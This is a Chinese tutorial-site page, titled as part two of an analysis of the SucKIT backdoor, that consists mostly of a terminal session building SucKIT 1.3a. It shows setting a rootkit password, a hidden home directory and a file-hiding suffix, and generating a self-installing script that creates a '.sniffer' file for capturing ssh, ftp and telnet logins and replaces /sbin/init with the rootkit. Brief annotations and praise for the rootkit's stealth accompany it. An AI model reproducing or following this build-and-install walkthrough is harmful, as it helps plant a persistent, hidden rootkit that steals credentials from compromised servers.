当前位置: 首页 > 图文教程 > 操作系统 > Unix/Linux > suckit后门程序的分析 (二)

Unix/Linux
linux 操作技巧收集_
linux下如何读取使用iso 镜像文件的方法
Linux平台下文件的压缩与解压参数说明
Linux下常用压缩格式的压缩与解压方法
Linux JDK,TOMCAT安装及环境设置
Linux sleep命令使用参数
Linux cat命令参数
nfs 配置的简单例子
linux kill 关闭进程命令
linux ultrasphinx Anonymous modules have no name to be referenced by
Linux oracle 9i图文安装方法一
Linux oracle 9i图文安装教程二
Linux oracle 9i图文安装教程三
Linux oracle 9i图文安装教程四
Linux oracle 9i图文安装教程五
Linux oracle 9i图文安装教程六 完结篇
linux AS3 oracle9i 安装指南
Linux 下 (RedHat 9.0) JDK,Tomcat,MySQL的安装
RedHat 9.0下Apache+PHP+MySQL服务器安装配置
Linux 下用 Python 连接 MSSql Server 2008

Unix/Linux 中的 suckit后门程序的分析 (二)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-01   浏览: 67 ::
收藏到网摘: n/a


这篇文章为我早期的时候发表的文章,为什么我要写这个呢?因为这个程序写得太精妙了,我不得不佩服他的隐藏性,非常先进。看看我写的就知道他的精妙之处了!
关于这场攻击与反攻击的文章我随后几天撰写。精彩不容错过!:P
[root@Learning sk-1.3a]#makePlease do `make skconfig` in top level directory to generate configuration file.make: *** [include/config.h] Error 1 (告诉我们不要用make,而是用make skconfig)[root@Learning sk-1.3a]#make skconfigrm -f include/config.h sk login instmake[1]: Entering directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o passmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'[===== SucKIT version 1.3a, Jul 26 2004 =====][====== ©oded by sd & devik , 2002 ======]Please enter new rootkit password: (让我们输入密码)Again, just to be sure: (再次输入确认密码)OK, new password set.Home directory [/usr/share/locale/sk/.sk12]: (通过后门进入的缺省目录)Magic file-hiding suffix [sk12]: (sk12后门程序,使用ls –l可以察看到有个.sniffer文件,这个文件是可以窃听到ssh、ftp、telnet等远程登陆的用户名与密码信息,这也正是为何debian服务器接连被黑的事件发生) Configuration saved. (保存配置文件)From now, _only_ this configuration will be used by generatedbinaries till you do skconfig again.To (re)build all of stuff type 'make' (开始执行make命令)[root@Learning sk-1.3a]# makemake[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zlogin.c sha1.o crypto.o -o loginrm -f sk kernel.omake skmake[2]: Entering directory `/root/backdoor/sk-1.3a/src'make[3]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c backdoor.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c client.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c install.cgcc -S -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b kernel.c -o - | grep -vE "\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version" >> kernel.sgcc -c kernel.sgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c kmem.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c lib.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c main.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c pattern.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c printf.cmake[3]: Leaving directory `/root/backdoor/sk-1.3a/src'gcc -s -nostdlib *.o -o skmake[2]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zbin2oct.c -o bin2octmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'cp -f src/DownloadFiles\login logincp -f src/DownloadFiles\sk skCreating install scriptecho "#!/bin/bash" > instecho "D=`cat include/config.h | grep HOME | awk {'print '}`" >> instecho "H=`cat include/config.h | grep HIDESTR | awk {'print '}`" >> instecho "mkdir -p $D; cd $D" >> instecho "echo > .sniffer; chmod 0622 .sniffer" >> instecho "echo -n -e `gzip -9 -c sk | src/DownloadFiles\bin2oct` | gzip -d > sk" >> instecho "chmod 0755 sk; if [ ! -f /sbin/init$ ]; " \"then cp -f /sbin/init /sbin/init$; fi;" \"rm -f /sbin/init; cp sk /sbin/init" >> instOkay, file 'inst' is complete, self-installing script. (将inst文件属性为可执行)Just upload it somewhere, execute and you could log in using./DownloadFiles\login binary.Have fun![root@Learning sk-1.3a]#chmod +x inst (将inst文件属性为可执行)[root@Learning sk-1.3a]# ./i